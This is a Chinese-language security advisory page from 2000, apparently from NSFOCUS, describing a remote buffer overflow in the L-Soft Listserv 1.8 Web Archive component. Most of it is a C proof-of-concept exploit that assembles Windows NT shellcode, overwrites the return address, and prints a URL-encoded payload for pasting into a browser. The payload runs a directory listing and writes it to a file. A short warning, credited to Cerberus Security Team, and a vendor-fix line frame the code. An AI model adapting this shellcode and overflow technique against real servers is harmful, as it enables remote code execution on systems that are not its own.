安全研究
安全漏洞
L-Soft Listserv 1.8 Web Archive组件缓冲区溢出漏洞
发布日期:2000-05-07
更新日期:2000-05-08
受影响系统:
L-Soft Listserv 1.8描述:
- Sun SunOS 4.1.4
- Sun SunOS 4.1.3
- Sun Solaris 8.0
- Sun Solaris 7.0
- SGI IRIX 6.5.6
- SGI IRIX 6.5.4
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Linux kernel 2.3.x
- Linux kernel 2.2.x
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- HP HP-UX 11.0
- HP HP-UX 10.0
- Digital Ultrix 4.5
- Digital Ultrix 4.4
- Digital OpenVMS AXP 7.1
- Digital OSF/1 3.2
- Digital OSF/1 3.0
- BSDI BSD/OS 4.0.1
- BSDI BSD/OS 4.0
L-Soft Listserv的Web Archive组件包含一段代码,它没有正确检查buffer大小。当提供一
个特殊编码的URL请求给Web Archive时,将允许远程攻击者执行任意代码。
<* 来源: Cerberus Security Team <CTS@CERBERUS-INFOSEC.CO.UK> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
//
//
// LSOFT's Listserv web archives wa.exe buffer overflow
//
//
// This is "proof of concept code" and will spawn a shell
// perform a directory listing and redirect the output
// to a file called "cerberus.txt". Will work on Windows NT 4
// SP6a
//
//
// David Litchfield (mnemonix@globalnet.co.uk)
//
// 1st May 2000
//
//
// Cut and paste the output into your web browser.
//
/////////////////////////////////////////////////////////////////
#include <stdio.h>
int main()
{
unsigned char exploit[2000]="";
int count = 0;
while(count <100)
{
exploit[count]=0x90;
count ++;
}
// push ebp
exploit[count]=0x55;
count ++;
// mov ebp,esp
exploit[count]=0x8B;
count ++;
exploit[count]=0xEC;
count ++;
// mov eax, 0x77f1a986
exploit[count]=0xb8;
count ++;
exploit[count]=0x86;
count ++;
exploit[count]=0xa9;
count ++;
exploit[count]=0xf1;
count ++;
exploit[count]=0x77;
count ++;
// mov ebx, 0xffffffff
exploit[count]=0xbb;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
exploit[count]=0xff;
count ++;
file://sub ebx, 0xffffff8B
exploit[count]=0x83;
count ++;
exploit[count]=0xeb;
count ++;
exploit[count]=0x8B;
count ++;
// push ebx
exploit[count]=0x53;
count ++;
// push "xt.s"
exploit[count]=0x68;
count ++;
exploit[count]=0x73;
count ++;
exploit[count]=0x2e;
count ++;
exploit[count]=0x74;
count ++;
exploit[count]=0x78;
count ++;
file://push "ureb"
exploit[count]=0x68;
count ++;
exploit[count]=0x62;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x72;
count ++;
exploit[count]=0x75;
count ++;
file://push "rec "
exploit[count]=0x68;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x72;
count ++;
file://push "> ri"
exploit[count]=0x68;
count ++;
exploit[count]=0x69;
count ++;
exploit[count]=0x72;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x3e;
count ++;
file://push "d c/"
exploit[count]=0x68;
count ++;
exploit[count]=0x2f;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x20;
count ++;
exploit[count]=0x64;
count ++;
file://push " exe"
exploit[count]=0x68;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x78;
count ++;
exploit[count]=0x65;
count ++;
exploit[count]=0x20;
count ++;
file://push "cmd."
exploit[count]=0x68;
count ++;
exploit[count]=0x63;
count ++;
exploit[count]=0x6d;
count ++;
exploit[count]=0x64;
count ++;
exploit[count]=0x2e;
count ++;
file://mov ebx, esp
exploit[count]=0x8b;
count ++;
exploit[count]=0xdc;
count ++;
file://xor esi, esi
exploit[count]=0x33;
count ++;
exploit[count]=0xf6;
count ++;
file://push esi
exploit[count]=0x56;
count ++;
file://push ebx
exploit[count]=0x53;
count ++;
file://call eax
exploit[count]=0xff;
count ++;
exploit[count]=0xd0;
count ++;
// set a break point (int 3)
while(count <420)
{
exploit[count]=0xCC;
count ++;
}
// overwrite the return address
exploit[count]=0x36;
count ++;
exploit[count]=0x28;
count ++;
exploit[count]=0xf3;
count ++;
exploit[count]=0x77;
count ++;
// put in 40 nops (0x90)
while (count < 464)
{
exploit[count]=0x90;
count ++;
}
// write our code that'll get us back into our un-tolower()ed string
// move edx, 0xFFFFFFFF
exploit[count]=0xBA;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
exploit[count]=0xFF;
count ++;
// sub edx, 0xFFDFAC87
exploit[count]=0x81;
count ++;
exploit[count]=0xEA;
count ++;
exploit[count]=0x87;
count ++;
exploit[count]=0xAC;
count ++;
exploit[count]=0xDF;
count ++;
exploit[count]=0xFF;
count ++;
// jmp edx
exploit[count]=0xFF;
count ++;
exploit[count]=0xE2;
count ++;
// set readable part in memory to stop first AV
exploit[390]=0x36;
exploit[390]=0xf3;
exploit[391]=0x77;
count = 0;
while(count < 477)
{
printf("%%%x",exploit[count]);
count ++;
}
return 0;
}
建议:
L-Soft已经更新了ListServ以解决这个问题,发信给<support@lsoft.com>以获取更详尽的
信息
浏览次数:15845
严重程度:0(网友投票)
绿盟科技给您安全的保障